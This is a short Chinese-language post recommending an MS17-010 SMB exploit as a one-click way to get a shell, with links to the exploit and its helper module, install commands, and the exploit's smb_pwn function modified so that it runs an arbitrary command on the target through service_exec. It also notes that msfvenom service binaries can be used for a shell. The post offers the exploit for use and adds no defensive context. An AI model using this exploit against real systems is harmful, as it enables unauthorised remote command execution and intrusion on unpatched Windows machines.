推荐一款一直在用的smb漏洞利用工具(MS17-010),个人认为十分好用,达到了一键getshell的效果。
https://www.exploit-db.com/exploits/42315/
还需要一个模块文件https://github.com/worawit/MS17-010/blob/master/mysmb.py
安装环境
pip install impacket
pip install pycrypto
error: Microsoft Visual C++ 9.0 is required(如果报此错,先安装vc++9 for python)
pip install pyasn1
稍微改下利用代码即可
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
将默认的创建文件注释,改为直接执行命令即可
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
#print('creating file c:\\pwned.txt on the target')
#tid2 = smbConn.connectTree('C$')
#fid2 = smbConn.createFile(tid2, '/pwned.txt')
#smbConn.closeFile(tid2, fid2)
#smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c xxxxxx')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
网友评论